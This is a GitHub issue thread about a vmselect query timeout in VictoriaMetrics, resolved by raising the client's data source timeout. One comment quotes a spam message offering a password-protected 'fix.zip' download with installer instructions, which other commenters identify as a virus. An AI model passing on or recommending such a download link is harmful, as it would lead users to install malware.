### ISSUE TITLE
Request vmselect query data error： timeout awaiting response headers

### ISSUE THREAD

**Issue by Coder-Cole** [VictoriaMetrics/VictoriaMetrics#6904]
### Is your question request related to a specific component?

vmselect

### Describe the question in detail

When I use some drawing tools to query vmselect to obtain data for drawing, I find an error message 
```
Post "http://dmo-vms-select-cluster.sns-duty-online.svc.sns-online.domeos.local:8481/select/0/prometheus/api/v1/query_range": net/http: timeout awaiting response headers. 
```
This query takes about 3-5 seconds and this error will appear. Is this caused by an unreasonable configuration of a timeout option of vmselect? However, I looked at the timeout configuration of vmselect, and the default value is greater than 3-5 seconds. At the same time, I also observed the resource usage of vmselect and vmstorage, and the resource usage rate is relatively low, and there is no bottleneck.
<img width="677" alt="image" src="https://github.com/user-attachments/assets/9b21eb45-acb9-4cf5-9447-58b392b696c9">

### Troubleshooting docs

- [ ] General - https://docs.victoriametrics.com/troubleshooting/
- [ ] vmagent - https://docs.victoriametrics.com/vmagent/#troubleshooting
- [ ] vmalert - https://docs.victoriametrics.com/vmalert/#troubleshooting

**Comment by CoderX-Aaron** [comment]
> Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc."

@vini1809 I don't know what you are talking about? Why should I download this file?

**Comment by youzi-2333** [comment]
@CoderX-Aaron Don't download this! This is a computer virus.

Also, don't use quote reply. GitHub may ban you.

**Comment by CoderX-Aaron** [comment]
@youzi-2333 OK ,i know,thanks

**Comment by jiekun** [comment]
I've deleted and reported the spam comment.

**Comment by jiekun** [comment]
Hello. I think it's not an error on vmselect side. It's likely that your client (maybe a frontend page/server HTTP client) sent request to vmselect, wait 3-5 seconds and response timeout while vmselect is still executing the query.

One way to verify it is to manually execute `curl http://<vmselect>:<port>/select/0/prometheus/api/v1/query_range` with your query argument that can take more than 5 seconds and see if could response correctly.

**Comment by Coder-Cole** [comment]
@jiekun I am very sorry to bother you. I didn't think about this. I solved this problem after modifying the query timeout of the data source. Thank you very much.
